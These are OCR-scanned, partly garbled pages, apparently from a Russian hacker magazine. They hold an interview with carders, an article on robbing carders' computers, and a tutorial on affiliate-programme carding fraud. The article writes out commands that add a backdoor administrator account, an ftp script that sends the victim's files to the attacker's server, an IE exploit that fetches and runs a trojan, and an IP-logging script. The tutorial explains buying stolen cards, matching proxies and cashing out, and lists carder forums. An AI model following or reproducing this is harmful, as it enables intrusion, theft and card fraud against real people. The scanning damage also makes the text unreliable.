David: Стал увлекаться кардингом 
чуть больше года назад. Ну, в прин- 
ципе, занятие кардингом меня сильно 
затянуло, да и неплохой денежный 
доход приносит. 


Graf: Занимаюсь кардингом уже 2 го- 
да, так как вижу в этом реальный 
способ заработать хорошие деньги, 
плюс огромный интерес. 


Сколько времени вам понадоби- 
лось, чтобы, встав однажды утром, 
гордо сказать: "Я - кардер"? 

Рама: Чтобы понять, что я действи- 
тельно кардер, мне понадобилось 
около года усиленной работы в этом 
направлении. 

Graf: Nonroguka :). 


Как продвигались? Что читали 
по ночам? 
David: Все началось со сбора полез- 
ной иноры из Сети и чтения подобных 
статей, что и помогло мне в этом ра- 
зобраться. 


Graf: Со мной произошла отдельная 
история. Я спокойно шел по улице и 
вдруг заметил кредитную карту с чи- 
пом. Я очень заинтересовался, есть 
ли там деньги, а также как их можно 
снять. Недолго думая, я обратился за 
помощью к интернету. Сначала я ис- 
кал, как взломать чип, потом посте- 
пенно узнал, что такое креды. Ну, a 
там, естественно, как их можно обна- 
личить. И пошло-поехало. 


XS: Что сейчас происходит Ha сце- 
не? Кого считаете своими кумирами 
в мире кардинга? 

Graf: Сцена живет, кардеры - это как 
чума, от которой еще не придумана 
вакцина. Мы были, есть и будем до тех 
пор, пока существует Сеть. Каждый 
кардер по-своему уникален, так что 
называть отдельно никого не буду. 
David: Есть для меня несколько автори- 
тетов в мире кардинга, но я бы не хо- 
тел говорить о них "в прямом эфире". 


XS: Как возникла идея создать 
сайт? 

David: Идея создать сайт пришла 
СгаКу, а я взял на себя ответствен- 
ность за его разработку. 

Graf: Я познакомился с Вам'ом, мы 
нашли общий язык, стали часто об- 
щаться, потом у меня появилась идея 
создать свой проект, он поддержал 
меня в этом начинании, после чего и 
появился сам сайт. Все просто, как 
сама жизнь :). 


XS: Какую функцию выполняет фо- 
рум на сайте? 

Graf: Помогает нашим мемберам в той 
или иной сфере кардинга, на нашем 
форуме всегда можно дать объявле- 
ние, найти что-либо необходимое для 
себя, проконсультироваться и поче- 
рпнуть кучу полезной информации. 
David: От себя хочу также добавить, 
что форум помогает общаться нович- 
кам и продвинутым кардерам, обме- 
ниваться опытом, получать ответы на 
различные вопросы и т.п. 


XS: Какими способами лично вы 
достаете креды? Какой из способов 
считаете самым оптимальным и бе- 
зопасным? 

David: Как? Я лично не хакер, чтобы 
ломать направо и налево интернет- 
магазины, поэтому покупаю картон у 
знакомых. 

Graf: Я беру кредитки у друзей. Счи- 
таю это самым безопасным способом, 
а так креды добываются в основном 
взломом различных порносайтов, он- 
лайн-шопов и прочих организаций, 
принимающих к оплате кредитные 
карты. 


XS: Как происходит торговля кре- 
дитными карточками? 

David: Креды (картон) можно купить у 
известных людей оптом, что будет 
намного дешевле, чем в розницу. Кар- 
тон продают в основном за WebMoney 


или за E-Gold. Схема такова: ты отп- 
равляешь определенную сумму на ко- 
шелек продавцу, а тебе взамен при- 
сылают по аське или по е-тай'у кар- 
тон. IMHO, нет ничего проще! 


XS: Какие методы используют он- 
лайн-шопы для борьбы с "ужасны- 
ми" кардерами? 

Graf: Методов борьбы очень много, 
но нам они уже давно известны и хо- 
рошо проработаны. Сначала были 
простые кредитки, сейчас ввели за- 
щитный код Cvv2 и сус. Хотя найти 
сайты с использованием простых 
кред тоже еще реально. Есть случаи, 
когда требуется голосовое подтверж- 
дение. Часто требуется выслать ска- 
ны паспорта, прав или кредитной кар- 
ты. Но мы не спим и постоянно приду- 
мываем методы противодействия 
различным защитам. 


XS: Совесть не мучает? 

David: А почему меня совесть должна 
мучить? Я же не своих граблю, а в OC- 
новном жадных буржуев или богатых 
магнатов. Я же не забираю nocneg- 
ние деньги у нищего. 

Graf: Нет, не мучает. A за что? За то, 
что я беру немного денег у зажрав- 
шейся нации, таких, как Амеры? Стра- 
на, где 60% населения страдают ожи- 
рением, которые вечно лезут, куда их 
не просят, что-то диктуют, указывают, 
в каждой жопе затычка? Один ста- 
рый кардер сказал умную фразу: "Мы 
сделаем Штаты немного беднее, а 
Россию и СНГ немного богаче". 


Х$: Ваша позиция ясна. А знаете 
такой отдел "К"? 

David: Конечно. Знаем и про отдел 
"P" и про отдел "К". Вот и использу- 
ем любые средства, чтобы обезопа- 
сить себя от них. Практически все 
кардеры используют анонимные 
прокси, VPN и прочие фишки. 

Graf: Знаю. Попасть к ним в лапы, ко- 
нечно, не хотелось бы, но, как гово- 
рится, волков бояться - в пес не хо- 
дить. 


XS: Какая ось установлена у Bac на 
ПК, какую считаете самой безопас- 
ной? 

David: В данный момент установлен 
Windows 2000 Pro. Не использую 
Linux, так как привык к окошкам. 
Graf: До появления ХР использовал 
98, а теперь всерьез подсел на ХР. А 
безопасность в микрососрте - поня- 
тие относительное :). 


XS: У кардера какой-то особый софт 
на тачке или как у всех? 

David: На моем писюке прижились 
Miranda, WinRar, FlashGet, RusmIRC, 
SocksCap, CuteFTP Pro, Internet 
Explorer, Webmoney, WinAmp и про- 
чие сосфтинки. А помимо этого ис- 
пользую множество самописного 
сосрта, перечислять нет смысла - все 
noname ;). 


Graft: Не буду оригинален: IE, OutLook, 
ICQ, WinAmp, OutPost... 


XS: Ha чем программируете? 
David: PHP, ASP u C++. 


XS: А чем занимаетесь в свободное 
от кардинга время? 

David: В свободное время пытаюсь 
находиться на расстоянии от компью- 
тера :). Отдыхаю как все обычные лю- 
ди. 

Graf: Учусь, тусуюсь в клубах, отды- 
хаю всячески и по-разному. 


XS: Что кардеры слушают? 

David: В основном Круг. Обожаю pyc- 
ский шансон, но могу на время за- 
пасть и на классные диджейские мик- 
сы. 

Graf: Особых кумиров у меня нет, но 
люблю послушать Linda, Enigma, 
Prodigy, In-Grid, Глюкоза и ВИАГРА. 


XS: Что читают? Любимый автор? 
David: Пока не хватает времени на 
книги, учусь усиленно :). 

Graf: Сейчас ничего не читаю, только 
прессу. Любимый автор - Достоевс- 
KUN. 


XS: Смотрите TB? 

David: Естественно смотрю, в OCHOB- 
ном спорт. Иногда новости. 

Graf: Конечно. Люблю хорошие 
фильмы и свежие новости. 

XS: И напоследок пару слов нашим 
читателям. 

Рама: Прежде чем примешь решение 
выйти на "большую дорогу", подумай 
над этим 101 раз. 


Картон про- 
дают в ос- 
новном за 
WebMoney 
или за Е- 
Gold. Схема 
такова: ты 
отправля- 
ешь опреде- 
ленную 
сумму на 
кошелек 
продавцу, а 
тебе взамен 
присылают 
по аське 
или по е- 
mail"'y кар- 
тон. 
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се люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуа- 

ле. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, 
продает кредитки, покупает различные вещи... и в какой-то момент все теряет. Из-за собственной невнимательности 
его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, 
казалось бы, защищенных кардеров? Давай попробуем разобраться. 


д 


УКРОТИМ 


СИСТЕМУ! 


m Способов украсть 


Способов 


украсть 
ценную ин- 
формацию и 
сбережения 
кардера 
очень много. 


Я не буду 
тебя учить 
эксплуати- 
ровать уяз- 
вимость. 06 
этом писали 
различные 
хакерские 
порталы, а 
также Ха- 
кер #9. Я 
лишь заост- 
рю твое 
внимание на 
командах, 
которые 
могут при- 
годиться 
взломщику, 
захватив- 
шему права 
на системе 
жертвы. 


ценную информацию и 
сбережения кардера 
очень много. Но стоит оговориться, 
что в этом деле главное не количест- 
во, а качество, то есть успешное при- 
менение этих способов. 


Итак, самое время рассказать, как же 
хакер может украсть данные у жерт- 
вы. Во-первых, это взлом компьютера 
богатого буратино ;). Здесь - как пове- 
зет, ничего нельзя сказать наверняка. 
Если человек - раззява и не читает 
багтраки, то шансы хакера резко воз- 
растают. В противном случае, да еще 
и с установленным на машине cpaep- 
волом, этот способ непригоден. 


Как же ломают рабочие станции поль- 
зователей? Тут также существуют 
свои способы. Остановимся на баж- 
ной WinNT. Ты всегда думал, что если 
винда имеет префикс МТ, то у нее 
стопроцентная защита? Я тебя разо- 
чарую. В таких платформах были най- 
дены очень опасные баги. 


ВРС-ЭПИДЕМИЯ 

m Если ты не знаешь об КРС-уязви- 
мости, то у тебя позднее зажигание ;). 
Об этой ошибке трубили все порталы 
по безопасности, а также было выпу- 
щено множество эксплоитов, в том 
числе и gna Windows (рай для скрипт- 
кидисов). Как же хакер может пои- 
меть бабла с наивного буржуя, кото- 
рый, наверное, и не знает о существо- 
вании патча от КРС-баги? Очень прос- 
то. Достаточно завладеть доступом к 
его системе и набрать ряд консоль- 
ных команд. После этого все важные 
документы будут находиться в лапах 
злоумышленника. 


Я не буду тебя учить эксплуатировать 
уязвимость. Об этом писали различ- 
ные хакерские порталы, а также Ха- 
кер #9. Я лишь заострю твое внима- 
ние на командах, которые могут при- 
годиться взломщику, захватившему 
права на системе жертвы. 
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Чтобы не использовать шумный 
эксплоит (который, кстати, может раз- 
рушить RPC-BbIZOBbI и привести сис- 
тему к краху) каждый раз, можно соз- 
дать аккаунт администратора. Его, как 
известно, пустят на такие ресурсы, 
как С$, 0$ и прочие. Это сделать 
очень легко. Достаточно лишь наб- 
рать следующие строки: 


net user admin nimda /add 
(добавляем нового пользователя 
admin с паролем nimda, параметры 
можно подставить свои). 

net localgroup Administrators admin 
/add 

(присвоим пользователю группу 
Administratots). 
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В случае, когда локализация плат- 
формы не английская, необходимо 
подставить название группы на pog- 
ном языке. Для этого хакер набирает 
"net user" и узнает истинное название 
группы. 

Если все было сделано верно (коман- 
ga net обязательно сообщит хакеру о 
результате операции), взломщик мо- 
жет зайти на машину с локального 
компа. В этом ему помогает команда 
"net use 2: \\IP-ADDRESS\CS". Но он 
этого никогда не сделает по одной 
простой причине - на машине ведутся 
логии, и его IP-agpec обязательно бу- 
дет записан. Но выход есть - хакер за- 
ходит не с себя, а со своего любимого 
скарженного шелла. 


smbclient //IP-ADDRESS/SC -U admin 


Эта команда актуальна для Linux. Noc- 
ле запроса пароля хакер попадает в 
системный ресурс $С (для того чтобы 
выполнить подобные действия, 
взломщик предварительно устанав- 
ливает на машину пакет samba). 


Но иногда простого доступа к дирек- 
ториям недостаточно. Например, в том 
случае, когда необходимо протроя- 
нить юзера или поставить на машину 
кейлоггер (а также просмотреть лист 
процессов, убить один из них ит.д. и 
т.п.). В этом случае взломщик либо ве- 
шает дополнительный бэкдор, либо 
использует эксплоит каждый раз. 


КТО ИЩЕТ, _ 
ТОТ ВСЕГДА НАЙДЕТ 

и В поиске информации нет ничего 
хитрого. Если хакер нетерпелив (а та- 
ких мало), он просто шарит по папкам 
и выкачивает сфайлы с подозритель- 
ными именами (типа 1.40с или 
paroli.doc). Текстовики можно прочи- 
тать на месте командой "type file". 
Многие руководства по взлому винды 
пишут об обязательном аккаунте на 
каком-либо ТЕТР-сервере. Однако 
можно выполнить операцию через 
обычную команду ftp. Предваритель- 
но составляется сценарий, который 
состоит из простых операций, переда- 
ваемых Нр. Он может выглядеть, нап- 
ример, следующим образом: 


user vasya vasyal23 

type binary 

put document.doc /xakep/document.doc 
quit 


После составления (команды сцена- 
рия последовательно записываются в 
файл с помощью echo и стандартного 
перенаправления ввода) скрипта, он 
передается консольной утилите с по- 
мощью параметра -5:имя_‹файла. Cne- 
дует учитывать, что аутентификация 
была произведена в одной команде, 
поэтому добавляем к командной стро- 
ке опцию -п. 


КОДИНГ 


В поиске 


информации 
нет ничего 
хитрого. Ес- 
ли хакер 
нетерпелив 
(а таких 
мало), он 
просто ша- 
рит по пап- 
кам и выка- 
чивает фай- 
лы с подоз- 
рительными 
именами 
(типа 
1111.doc или 
paroli.doc). 
Текстовики 
можно про- 
читать на 
месте ко- 
мандой 
"type file". 


Если хакер 
взламывает 


Ici) подобньн 


ресурс, он 
er Te Tie просто за- 
ыы меняет в 
исходном 
коде скрип- 
та ссылку и 
параметры 
на свой ко- 
шелек 
WebMoney. 
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Следует отметить, что в винде нет ко- 
манды поиска, которая присутствует в 
Ипих. Но это совсем не означает, что 
найти файл в консоли невозможно. 
Предметом охоты для хакера являют- 
ся кошельки WebMoney, которые име- 
ют расширение kwm и pwm. Их можно 
найти следующей командой: 


При этом будет выполняться рекур- 
сивный вывод всех каталогов с диска 


Следует 
помнить, 
что для вы- 
полнения 
$$1-вста- 
вок, файлу 
необходимо 
дать расши- 
penne shtml. 


Эффектив- 
ным спосо- 
бом хище- 
ния инфор- 
мации явля- 
ется сни- 
финг дан- 
ных. Сни- 
фер - прог- 
рамма, ко- 
торая пе- 
рехватыва- 
ет весь тра- 
фик на оп- 
ределенных 
интерфей- 
сах и отби- 
рает из него 
инфу, кото- 
рая указана 
в конфе 
снифака. 


c:\ и последующая фильтрация ‹фай- 
лов с помощью команды find. 


WEBMONEY - РАДОСТЬ ХАКЕРА 


После того, как кошельки 
WebMoney будут скачаны, необходи- 
мо узнать идентификатор счета (это 
выполнит клиент), а также пароль на 
вход. Пароль на WebMoney не может 
быть изменен и задается всего один 
раз (аналог PIN-kKoga в кредитной кар- 
те), поэтому возможно, юзер записал 
его в файл, чтобы не забыть. При 
удачном стечении обстоятельств, ха- 
кер вытягивает этот Clan и кошельки 
и полностью завладевает счетом 
жертвы. Внимание! Это очень опасно, 
поскольку система перевода денег 
имеет историю всех проведенных опе- 
раций. Скажу по опыту, что у взлом- 
щиков есть свои люди, которые отмы- 
вают деньги на счете, беря за услуги 
некоторый процент от суммы. 


Существуют и другие способы добычи 
пароля. Например, такой: хакер сумел 
узнать несколько паролей, которые 
жертва использует в Сети. Он пробует 
перебрать их все и, возможно, один 
из них будет верным. Когда способов 
не остается, можно найти подходящий 
кейлоггер, шлющий клавиатурный 
дамп на вражеский e-mail адрес. Пос- 
ле того как он будет запущен на 


ОБЗОР СНИФЕРОВ 


компьютере, остается только ждать, 
пока пользователь не воспользуется 
клиентом WebMoney. Существует спо- 
соб gna ускорения этого процесса - 
отправка жертве письма, в котором 
будет говориться о том, что кошелек 
был пополнен на энную сумму. Torga- 
то он обязательно запустит клиент. 


Вообще, есть еще один метод завла- 
дения \\/М-кошельком. Он практикует- 
ся среди богатых, но ламернутых лич- 
ностей, которые недавно, но успешно 
постигают кардерские махинации. 
Создается программа, типа "крякера 
интернета", но она не крякает интер- 
нет, а уводит кошельки WebMoney. 
Реализовать ее - пара пустяков, проб- 


———— SO — | 


nema в другом - впарить прогу жертве. 
Это может сделать хороший хакер, 
имеющий богатый опыт в социальной 
инженерии. 

Исходный код этой небольшой прог- 
раммы ты найдешь во врезке. Полный 
исходник проекта есть на диске. 


Помимо самой службы \\ебМопеу, 
есть сервис Merchant 

( ), который 
нужен для проведения онлайн-опера- 
ций по переводу денег с одного WM- 
кошелька на другой. Обычно сервис 
применяется в различных проектах, 
например, интернет-магазинах. Если 
хакер взламывает подобный ресурс, 
он просто заменяет в исходном коде 
скрипта ссылку и параметры на свой 


кошелек WebMoney. При этом клиент 
будет пересылать деньги на счет зло- 
умышленника. Бесспорно, это скоро 
будет замечено, но взломщик успеет 
обогатиться. 


БРЕШИ В ОСЛИКЕ 

ВРС-уязвимость далеко не един- 
ственная бага в сфорточках. Рассмот- 
рим еще один пример - ошибка в об- 
работке тега <OBJECT>, позволяющая 
выполнять произвольный код на ма- 
шине клиента. Реализовав такую уяз- 
вимость, хакеру ничего не стоит за- 
лить троян на жертву, да еще и запи- 
сать в лог его IP-agpec, который впос- 
ледствии будет проверен Ha зараже- 
ние бэкдором ;). 


Для написания эксплоита достаточно 
создать следующий Пёт[-документ: 


<object data="/object.html">NpuBet 
всем ;)</object> 


A B object.html положить скрипт, нап- 
ример на Visual Basic. В нем будет npo- 
изводиться выкачивание трояна по 
указанному адресу и его последую- 


щий запуск. При желании можно по- 
фантазировать с записью бэкдора в 
реестр (если, конечно, в нем уже не 
реализована подобная функция), но 
это исключительно проблемы взлом- 
щика. 

Для записи |Р-адреса в лог-сфайл на- 
до написать простенький рег-скрипт. 
Например, такой: 


#!/usr/bin/perl 


print "Content-type: text/html\n\n"; 
Sip=SENV{REMOTE_ADDR}; 
open(LOG,">>ipz.log"); 

print LOG "Sip\n"; 

close(LOG); 


На этот сценарий делается редирект с 
главной страницы, либо вызывается 
SSI-Bknagka, к примеру, следующая: 


<!--Нехес cgi="/path/to/iplog.cgi"'->. 


Следует помнить, что для выполнения 
SSI-BcTaBok, файлу необходимо дать 
расширение shtml. Что касается срай- 
лов gna записи (ipz.log), то они долж- 
ны иметь атрибут 666. 


НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ WWW.XAKEP.RU 


Смысл этого метода заключается в за- 
сылке вредоносных программ на 
компьютер жертвы, используя бреши 
в операционной системе. Регулярно 
обновляемый список уязвимостей ты 
можешь найти на любом портале по 
безопасности. 


А КАК ЖЕ LINUX? 

m Что касается Linux, то все методы 
этой, казалось бы, неприступной сис- 
темы были изложены в статье этого 
номера "Найди и поимей!". В этой сис- 
теме можно найти, пожалуй, только 
кредитные карты и файлы, хранящие 
в себе пароли, а также аккаунты на 
какие-либо ресурсы. 


Эдфофективным способом хищения ин- 
формации является снифинг данных. 
Сниффер - программа, которая перех- 
ватывает весь трасфик на определен- 
ных интерфейсах и отбирает из него 
инфу, которая указана в KOHCpe сни- 
cpaka. Программ, которые перехваты- 
вают весь траффик и записывают его в 
логи (при этом фильтрация остается 
проблемой хакера), довольно мало. В 
основном, сниферы удобно настраи- 
ваются и незаметно запускаются на 
сервере. 


Принцип всех сниферов основан, как я 
уже сказал, на перехвате данных опре- 
деленного сетевого интерсрейса. При 
этом устанавливается режим promisc, 
при котором все данные проходят че- 
рез сетевую карту, несмотря на то, что 
предназначены они были для других 
машин. Ты, наверное, догадываешься, 
что успешно заюзать снифер можно 
лишь на компьютерах, которые выпол- 
няют функцию маршрутизаторов. Если 
это так, то хакер будет перехватывать 
весь трабрик в локальной сети. 


В последнее время сниферы пишут 
очень грамотные люби. ИХ не способ- 
ны засечь никакие утилиты, типа рэ, 
ifconfig, IDS и прочие. 


(ЗН 


Еще одним интересным способом 
взлома является брутфорсинг (пере- 
бор) паролей на определенный сер- 
вис. Я слышал о таких приватных про- 
ектах, как переборщик https-akkayH- 
тов. Таким образом, взломать учет- 
ную запись бизнесмена на каком-ли- 
бо секурном сервисе вполне реально. 


Я уже не говорю о переборе паролей 
на небезопасных сервисах, которые 
поддаются снифингу. Таких OpyTcpop- 
серов в интернете навалом, и боль- 
шинство из них поддерживают много- 
поточный перебор. Конечно, прошли 
времена, когда в качестве аккаунтов 
применялись пары root/root или 
admin/admin, но словарные пароли 
встречаются очень часто. Так что по- 
добрать пароль становится вполне 
реальным. 


Таким образом, подвожу итог. Воров- 
ство аккаунтов - наболевшая тема. 
Воруют все кому не лень, и то, что 
плохо лежит. Поэтому, если ты пре- 
успевающий сетевой бизнесмен, ре- 
комендую защитить свою систему 
необходимыми патчами, а также гра- 
мотно настроенным фаерволом. 
Только тогда ты будешь в абсолют- 
ной безопасности. a 


- А ТЫ ЗАПУСТИ .EXE-LWHNK ИЗ АТТАЧА! 
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этой статье будет описан один из немногих способов кардинга, интересный для новичков в этом деле. Сразу 

предупрежу, что все нижесказанное не следует применять на практике, т.к. это противозаконно и может повлечь 
наказание по статьям 272, 273 УК РФ, а также рассматриваться как мошенничество. Автор статьи никогда не 
использовал эти материалы на практике. Статья написана исключительно в образовательных целях. 


авай вкратце рассмот- 


рим основную идею 


этого метода. В интер- 


нете есть множество 


Но не ки- 
дайся на 
первый по- 
павшийся 
сайт, снача- 
ла пройдись 
по разным 
компаниям 
и изучи их 
условия. 


Ну а самый 
сладкий ку- 
сочек = ус- 
луга dedi- 
cated 
servers 
(apenga 
cepBepa). 
Стоит это 
удоволь- 
ствие неде- 
шево, поэ- 
тому и про- 
центы бу- 
дут нема- 
ленькие. 


Для обна- 
личивания 
подойдет 
обычный 


счет где- 
нибудь в 
Латвии. При 
особом же- 
лании и на- 
личии лиш- 
них денег 
счет можно 
открыть са- 
мому, а 
можно ку- 
пить уже 
готовый. 


организаций, которые 


делают в Сети бизнес. Очень часто 
можно встретить сайты, на которых 
предлагаются услуги хостинга, арен- 
ды серверов, продаются темплейты и 
скрипты для веб-мастеров. Эти ком- 
пании различным образом реклами- 
руют свои услуги, и одним из мето- 
дов рекламы являются партнерские 
программы. Они могут быть разными, 
но в большинстве случаев тебе 
предлагают рекламировать на своем 
сайте товар или услугу, обычно пос- 
редством баннера. За каждого клиен- 
та, пришедшего по ссылке с твоего 
сайта и купившего этот товар, ты по- 
лучаешь процент или некоторое 
фиксированное вознаграждение. 
Поскольку такие услуги или товары 
обычно являются виртуальными, то 
компания предлагает удобные спосо- 
бы их оплаты, такие, как электрон- 
ные платежные системы, и, конечно, 
кредитные карты. В общем, если у те- 
бя есть раскрученный веб-проект с 
большой посещаемостью, ты мо- 
жешь работать по партнерской прог- 
рамме вполне легально. 


А теперь подумай, что произойдет, 
если кто-нибудь сделает сайт, соз- 
даст видимость его нужности и по- 
сещаемости и разместит на нем бан- 
неры партнерской программы. До- 
пустим, его партнером будет компа- 
ния, предоставляющая услуги хос- 
тинга. Далее - он сам выступает в 
роли покупателя: заходит на свой 
сайт, кликает по баннеру и попадает 
на страницу партнера. Выбирает ин- 
тересующий его тарифный план и 
покупает хостинг. Только вот поку- 
пать он его будет не на свои деньги, 
а на чужую кредитную карту. В ито- 
ге все довольны: партнер приобрел 
клиента, а кардер получил процент 
от сделки. Как получить этот про- 
цент и превратить его из виртуаль- 
ных денег в реальные и будет под- 
робно описано ниже. 
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Итак, для начала необходимо: 


Ф. Стартовый капитал (примерно 
300-400 долларов). 

©. Знание HTML, графических pe- 
дакторов. 

@. Начальные знания английского 
языка (знания других языков привет- 
ствуются). 

@. Компьютер, доступ в интернет, 
прямые руки, немного серого вещест- 
ва в голове. 

Предполагаемая прибыль: от $500 в 
месяц и выше. 


ПОДБИРАЕМ ПАРТНЕРА 

m Для начала нам надо подобрать 
партнера, чьи услуги или товары при- 
дется рекламировать. Искать партнера 
среди наших компаний и компаний на 
территории бывшего СССР бесполезно. 
Во-первых, потому, что это нарушает 
неписаные законы кардеров, во-вторых 
- потому, что нехорошо обманывать 


своих. Тем более что за бугром подоб- 
ных компаний намного больше, да и 
платят они очень приличные деньги. 
Найти партнера несложно, для этого 
надо зайти в гугл (www.google.com) и 
набрать в строке поиска: "affiliates pro- 
gram" (партнерская программа). По 
запросу гугл выведет огромное коли- 
чество компаний, предлагающих раз- 
личные товары и услуги и приглашаю- 
щих тебя стать их партнерами. Не стоит 
кидаться на первый попавшийся сайт, 
сначала лучше пройтись по разным 
компаниям и изучить их условия. Луч- 
ше всего, конечно, найти партнера, ко- 
торый будет выплачивать заработан- 
ное с помощью \\ебМопеу или Ha E- 
Gold. Компании же, предлагающие та- 
кие способы выплат, как РауРа! или на- 
личные, следует отметать сразу. 


Далее нас будут интересовать способы 
оплаты, которыми клиенты могут запла- 
тить за их услуги. Естественно, нам ну- 


жен способ оплаты NO кредитной карте. 
Теперь надо обратить особое внимание 
на то, что именно предлагает будущий 
партнер. Товар должен быть вирту- 
альным. Книги, футболки, а тем более 
ноутбуки не подходят. На мой взгляд, 
лучше всего рекламировать хостинг и 
темплейты. Ну а самый сладкий кусо- 
чек - услуга dedicated servers (аренда 
сервера). Стоит это удовольствие не- 
дешево, поэтому и проценты кардер 
получит немаленькие. 


Теперь следует проверить, насколько 
легко скардить данный товар или ус- 
лугу. Попробуй сначала сам, и если 
все пройдет нормально, то эта компа- 
ния нам подходит. Да, пока не забыл - 
обрати внимание на то, как часто мож- 
но получать свои деньги. Я думаю, не 
стоит работать с компанией, которая 
выплачивает проценты раз в полгода. 
К счастью, таких маньяков почти нет. 
Кроме того, есть такое понятие, как 
"первоначальный холц" - это время, в 
течение которого твои первые деньги 
замораживаются. Мне кажется, что оп- 
тимальным выбором будет компания, 
выплачивающая деньги раз в неделю 
и имеющая первоначальный холод 2 не- 
дели. Но это большая редкость, обыч- 
но выплаты производят раз в месяц. 


Итак, подведем краткие итоги. 
Партнер должен: 


Ф. Находиться за пределами быв- 
шего СССР. 

@. Принимать к оплате кредитные 
карты. 

9. Выплачивать проценты по 
WebMoney, E-Gold или wire transfer 
(банковский NepeBog). 

@. Легко кардиться. 

@. Продавать виртуальный товар. 

@. Производить выплаты не реже 
раза в месяц. 


ДЕЛАЕМ САЙТ А-ЛЯ 
"POrA И КОПЫТА" 

m Ну что ж, партнера ты нашел, те- 
перь нужен сайт, который будет его 
рекламировать. Для начала следует 
определиться с хостингом и домен- 
ным именем. Хостинг и домен точно не 
должны быть нашими. Западные ком- 
пании как огня боятся людей из СНГ, 
думая, что все мы - мошенники. 

Все это добро можно, разумеется, 
скардить, но хостинг лучше купить. 
обойдется он не очень дорого, бери 
самый дешевый тарисфный план, т.к. 
базы данных и всякие примочки, ти- 
па ssh доступа, тебе вряд ли понадо- 
бятся. Домен можно и скардить, но и 
купить тоже можно, поскольку стоит 
он недорого. Будет очень обидно, ес- 
ли после месяца работы у тебя все 
это отберут, и ты не успеешь даже 
окупить потраченные деньги. Домен 
лучше зарегистрировать в зоне 
.com, .net, .org. 


Теперь придется поработать веб- 
мастером. Твой сайт должен иметь 
идею. Это не должна быть странич- 
ка Васи Пупкина. Можно, например, 
сделать развлекательный сайт, он- 
лайн-журнал обзора новинок желе- 
за-сосрта или то, что тебе ближе 
всего. Учти, что почти все запад- 
ные компании откажутся с тобой 
работать, если на твоем сайте бу- 
дет порнограсрия, призывы к расиз- 
му, пропаганда оружия или нарко- 
тиков. Тема должна быть привыч- 
ная, не вызывающая подозрений и 
лишних вопросов. 


Дизайн сайта должен быть доброт- 
ным. Совсем не стоит делать летаю- 
щие звезды или прыгающих зайцев, 
то есть - всего того, что в народе на- 
зывают попсой. Выбери спокойные 
цвета, привычный дизайн. Твой парт- 
нер обязательно захочет взглянуть 
на проект, и он никоим образом не 
должен вызывать подозрений. Можно 
пойти и более хитрым путем, напри- 
мер, сделать сайт на китайском языке, 


СПИСОК САЙТОВ, НА КОТОРЫХ МОЖНО НАЙТИ МНОГО 
ПОЛЕЗНОГО ДЛЯ НАЧИНАЮЩЕГО КАРДЕРА: 


Ш forum.carderplanet.net 
Ш thecc.ru 


Ш www.increw.com/Inforum 
Ш www.carderclan.net 
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ЧТО BAM 
HYmHO 


ЗНАТЬ 0 DVD 


КАЖДЫЙ МЕСЯЦ 
С ФИЛЬМОМ НА DVD 


Дизайн сай- 
та должен 
быть go6- 
ротным. 
Совсем не 
стоит ge- 
лать летаю- 
щие звезды 
или прыга- 
ющих зай- 
цев, то есть 
всего того, 
что в наро- 
де называ- 
ют попсой. 


Тебе пона- 
добятся 
SOCKS 
прокси. Же- 
лательно, 
чтобы прок- 
си, которы- 
ми ты бу- 
дешь поль- 
зоваться, 
были того 
же штата, 
что и твоя 
сс. 


Лучше все- 
го покупать 
дебитные 
сс, посколь- 
ку чардожбэк 
по ним идет 
дольше, ме- 
сяца 3-4. 


КАРДИНГ ПАРТНЕРСКИХ ПРОГРАММ ) 


чтобы партнеры ничего не поняли. 
Делается это легко: достаточно зайти 
на любой китайский сайт, скопиро- 
вать оттуда много иероглисфов, и, по- 
меняв их местами, вставить в свой 
сайт. Это очень удобное решение, 
поскольку вопросов будет меньше, да 
и партнер будет рад - ведь китайцев 
целый миллиард, и это очень боль- 
шой рынок будущей клиентуры. 


После того как проект будет готов, 
можно идти на сайт партнера и реги- 
стрироваться. Если все пройдет нор- 
мально и у него не появятся лишние 
вопросы, в скором времени ты полу- 
чишь письмо с поздравлениями и 
дальнейшими инструкциями. Вешай 
на свой сайт баннеры и приступай к 
дальнейшей работе. 


Подведем краткие итоги. Наш сайт 
должен иметь: 


@. Хостинг и домен, которые не ука- 
зывают на принадлежность к СНГ. 

©. Смысл и идею, которая не вызо- 
вет подозрений у партнера. 

©. Добротный дизайн, контент и 


структуру. 
ОСОБЕННОСТИ ВБИВА 


m Теперь, когда у тебя есть сайт, 
который рекламирует партнера, са- 
мое время для торжественной части. 
Тут много тонкостей. Про все расска- 
зать не удастся, т.к. у каждого парт- 
нера свои заморочки. Но основные 
принципы обсудить стоит. Прежде 
всего, тебе понадобятся сами карты, 
которые ты будешь вбивать (распла- 
чиваться за услуги спонсора). Если у 
тебя уже есть своя база или ты мо- 
жешь взламывать интернет-магази- 
ны, то одна из статей расходов исче- 
зает. Ну а если нет, то это совсем не 
проблема. Я думаю, не стоит объяс- 
нять, что сгенерированные карты 
уже давно никто не принимает. Кар- 
ты (далее - сс) всегда можно купить 
в интернете у людей, которые зани- 
маются их добычей и продажей. Най- 
ти продавца сс можно на кардерских 
сайтах и форумах. При выборе про- 
давца обязательно узнай, насколько 
он надежен. Обычно на форумах 
можно посмотреть дату его регистра- 
ции и отзывы других покупателей. 
Тебе понадобятся карты с CVV2 ко- 
дом. Скорее всего, ты будешь ис- 
пользовать сс из Америки. Средняя 
цена в интернете - $2 за одну сс. 


Бери сразу не одну-две сс, а штук 
50-100. В этом случае ты можешь по- 
лучить скидку от продавца. Лучше 
всего покупать дебитные сс, пос- 
кольку чарджбэк по ним идет доль- 
ше, месяца 3-4. 


Однако карты - это еще не все. Стоит 
позаботиться и о своей безопасности. 
Для этого тебе понадобятся прокси- 
серверы. Не стоит надеяться на прок- 


си, взятые из публичных источников, 
т.к. большинство процессингов также 
имеют эти списки и строго следят за 
тем, чтобы клиент, производящий оп- 
лату, не зашел под ними. Нам понадо- 
бятся SOCKS прокси. Желательно, 
чтобы прокси, которыми ты будешь 
пользоваться, были того же штата, 
что и твоя сс. Поэтому приобретать их 
тебе придется у людей, которые спе- 
циально предоставляют подобные 


Объявление о продаже СС 


Что подумает партнер, когда обнаружит, что 
из трех пользователей в день, 
заходящих к тебе на сайт, все тут же 
кликают на баннер и покупают его услуги? 


сервисы. Найти их можно также на 
кардерских сфорумах. В среднем, дос- 
